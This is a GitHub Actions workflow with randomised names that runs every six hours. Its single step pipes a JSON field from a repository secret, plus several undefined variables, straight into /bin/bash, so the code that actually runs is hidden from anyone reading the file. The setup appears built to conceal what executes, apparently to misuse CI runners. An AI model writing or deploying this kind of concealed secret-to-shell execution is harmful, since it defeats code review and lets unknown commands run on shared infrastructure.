name: guoqingpao3456
on:
  workflow_dispatch:
  schedule:
    - cron: '28 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guoqingpao3456
        env:
          q41: ${{ secrets.q41 }}
        run: |
          echo $q41 | jq -r .kxlqu8152 | /bin/bash
          echo $k42882 | jq -r .eut7329 | /bin/bash
          echo $zfqbw48 | jq -r .tn79 | /bin/bash
          echo $ef174 | jq -r .iceoq3245 | /bin/bash
          echo $jena19051 | jq -r .bo6 | /bin/bash
          echo $zx7 | jq -r .v3 | /bin/bash
          echo $soa64742 | jq -r .ad7 | /bin/bash
          echo $j76 | jq -r .icyur23797 | /bin/bash

